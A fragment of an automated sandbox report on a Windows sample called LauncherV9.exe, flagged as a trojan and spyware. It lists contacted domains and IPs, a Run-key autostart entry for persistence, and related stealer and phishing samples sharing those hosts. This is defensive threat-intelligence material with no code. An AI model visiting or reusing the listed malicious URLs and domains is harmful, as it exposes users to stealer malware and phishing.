00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://recaptcha.net/recaptcha/;dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://api.ipify.org/sService.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://steamcommunity.com/discussions/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icodll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://store.steampowered.com/stats/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://medal.tvdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://broadcast.st.dl.eccdnx.comdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://steamcommunity.com/Qdll.exe, 00000010.00000002.1612064321.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558165150.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            89.208.104.175
                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                            42569PSKSET-ASRUfalse
                                                                                                                                                                                                                            104.26.12.205
                                                                                                                                                                                                                            api.ipify.orgUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            23.197.127.21
                                                                                                                                                                                                                            steamcommunity.comUnited States
                                                                                                                                                                                                                            20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            104.21.96.1
                                                                                                                                                                                                                            pupmeholk.betUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            140.82.121.4
                                                                                                                                                                                                                            github.comUnited States
                                                                                                                                                                                                                            36459GITHUBUSfalse
                                                                                                                                                                                                                            104.73.234.102
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                            185.199.110.133
                                                                                                                                                                                                                            raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                            Analysis ID:1639444
                                                                                                                                                                                                                            Start date and time:2025-03-15 16:38:12 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 7m 24s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:29
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:LauncherV9.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@27/18@17/7
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 64%
                                                                                                                                                                                                                            • Number of executed functions: 60
                                                                                                                                                                                                                            • Number of non-executed functions: 154
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.60.203.209, 23.199.214.10, 4.245.163.56, 20.199.58.43, 150.171.27.10, 2.23.227.215, 20.12.23.50
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            11:39:04API Interceptor112x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            11:39:18API Interceptor7x Sleep call for process: dll.exe modified
                                                                                                                                                                                                                            16:39:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FileAutostart C:\Users\user\AppData\Local\Service.exe
                                                                                                                                                                                                                            16:39:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FileAutostart C:\Users\user\AppData\Local\Service.exe
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            89.208.104.175Service.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              104.26.12.205Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/?format=xml
                                                                                                                                                                                                                              NightFixed 1.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              VRChat_ERP_Setup 1.0.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              wEY98gM1Jj.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              DeepLauncher.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              [Huawei] Contract for YouTube partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • api.ipify.org/
                                                                                                                                                                                                                              23.197.127.21http://steamcomunity.aiq.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • steamcommunity.com/
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              raw.githubusercontent.comOrder.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 185.199.111.133
                                                                                                                                                                                                                              COMSurrogate.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                              • 185.199.111.133
                                                                                                                                                                                                                              steal.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                              • 185.199.111.133
                                                                                                                                                                                                                              I_ Order.msgGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 185.199.110.133
                                                                                                                                                                                                                              I_ Order.msgGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              srclogsys.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 185.199.109.133
                                                                                                                                                                                                                              srclogsys.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 185.199.111.133
                                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.3746.11060.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              SubzB.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 185.199.110.133
                                                                                                                                                                                                                              github.comwork.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              http://t.go.rac.co.uk/r/?id=h1020a75,d7623c,1ac8b&p1=r%EF%BB%BF%EF%BB%BFe%EF%BB%BF%EF%BB%BFv%EF%BB%BF%EF%BB%BFi%EF%BB%BF%EF%BB%BFe%EF%BB%BF%EF%BB%BFw%EF%BB%BF%EF%BB%BFs%EF%BB%BF%EF%BB%BFt%EF%BB%BF%EF%BB%BFi%EF%BB%BF%EF%BB%BFp%EF%BB%BF%EF%BB%BFs%EF%BB%BF%EF%BB%BFa%EF%BB%BF%EF%BB%BFn%EF%BB%BF%EF%BB%BFd%EF%BB%BF%EF%BB%BFo%EF%BB%BF%EF%BB%BFf%EF%BB%BF%EF%BB%BFf%EF%BB%BF%EF%BB%BFe%EF%BB%BF%EF%BB%BFr%EF%BB%BF%EF%BB%BFs.com/sys/html/SNRgusxqYwmKT0SXMypB0/aW52ZXN0bWVudHNAZmlyc3RvbnRhcmlvLmNvbQ==Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              https://dns.toytviyy.es/NeCp/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              Play___New___VM___01min 10sec_____;-9415036076e8bac121c0e98c86740024257f1403349096ae54.htmGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                              https://sp-track.info.socialmaud.digital/api/v1/track/click/355/30046/17/default/6b7d5c97-8b19-4c41-b355-64ecd84af44a?redirecturl=https://gamma.app/docs/POM-Technologies-Proposal-1tjhhormn8i5mpbGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              https://t.travel.hiltongrandvacations.com/r/?id=h178a3ad8,189f53d6,13d9fb3c&p1=xj8ae4rm.lindylosidew.ru/usGt/*bG9uZy5uZ3V5ZW5AY3Jlc3RsaW5laG90ZWxzLmNvbQ==Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              VM Orger Acknowledged.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                              steamcommunity.comSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 104.73.234.102
                                                                                                                                                                                                                              InstructionalPostings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 23.192.247.89
                                                                                                                                                                                                                              InstructionalPostings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 23.192.247.89
                                                                                                                                                                                                                              installsbot.crypt.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 23.197.127.21
                                                                                                                                                                                                                              installer_ver19.02.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 23.197.127.21
                                                                                                                                                                                                                              installer_ver12.22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 23.192.247.89
                                                                                                                                                                                                                              alexx111.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 23.197.127.21
                                                                                                                                                                                                                              work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 23.192.247.89
                                                                                                                                                                                                                              shuzovv_build.2.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 23.197.127.21
                                                                                                                                                                                                                              crypted.7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 23.192.247.89
                                                                                                                                                                                                                              pupmeholk.betinstallsbot.crypt.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              CLOUDFLARENETUSRelease.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 172.67.169.6
                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              FusionLoader v2.1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                              • 104.20.4.235
                                                                                                                                                                                                                              finebi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              f